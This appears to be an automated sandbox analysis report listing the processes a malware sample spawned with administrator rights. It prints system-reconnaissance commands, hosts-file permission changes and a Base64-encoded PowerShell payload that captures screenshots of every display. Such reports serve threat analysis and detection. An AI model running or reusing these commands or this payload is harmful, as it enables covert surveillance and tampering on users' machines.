                                                                                                                                                                                                                              Imagebase:0x1560000
                                                                                                                                                                                                                              File size:82'432 bytes
                                                                                                                                                                                                                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:64
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:76'800 bytes
                                                                                                                                                                                                                              MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:65
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:66
                                                                                                                                                                                                                              Start time:01:19:33
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:67
                                                                                                                                                                                                                              Start time:01:19:34
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:68
                                                                                                                                                                                                                              Start time:01:19:34
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:70
                                                                                                                                                                                                                              Start time:01:19:34
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:71
                                                                                                                                                                                                                              Start time:01:19:35
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                              Imagebase:0xf0000
                                                                                                                                                                                                                              File size:59'392 bytes
                                                                                                                                                                                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:72
                                                                                                                                                                                                                              Start time:01:19:35
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:73
                                                                                                                                                                                                                              Start time:01:19:35
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:74
                                                                                                                                                                                                                              Start time:01:19:35
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:75
                                                                                                                                                                                                                              Start time:01:19:35
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:76
                                                                                                                                                                                                                              Start time:01:19:36
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x8e0000
                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                              MD5 hash:7E896B29B309DE74A72DEC7D59715EFD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:77
                                                                                                                                                                                                                              Start time:01:19:36
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                              Imagebase:0xb0000
                                                                                                                                                                                                                              File size:19'456 bytes
                                                                                                                                                                                                                              MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:78
                                                                                                                                                                                                                              Start time:01:19:36
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline"
                                                                                                                                                                                                                              Imagebase:0x980000
                                                                                                                                                                                                                              File size:2'141'552 bytes
                                                                                                                                                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:79
                                                                                                                                                                                                                              Start time:01:19:37
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED03.tmp" "c:\Users\user\AppData\Local\Temp\bifucm0t\CSCB2EB15F711B84CFFA3556DECAB136738.TMP"
                                                                                                                                                                                                                              Imagebase:0xce0000
                                                                                                                                                                                                                              File size:46'832 bytes
                                                                                                                                                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:80
                                                                                                                                                                                                                              Start time:01:19:37
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:81
                                                                                                                                                                                                                              Start time:01:19:37
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:82
                                                                                                                                                                                                                              Start time:01:19:37
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:83
                                                                                                                                                                                                                              Start time:01:19:38
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:84
                                                                                                                                                                                                                              Start time:01:19:38
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

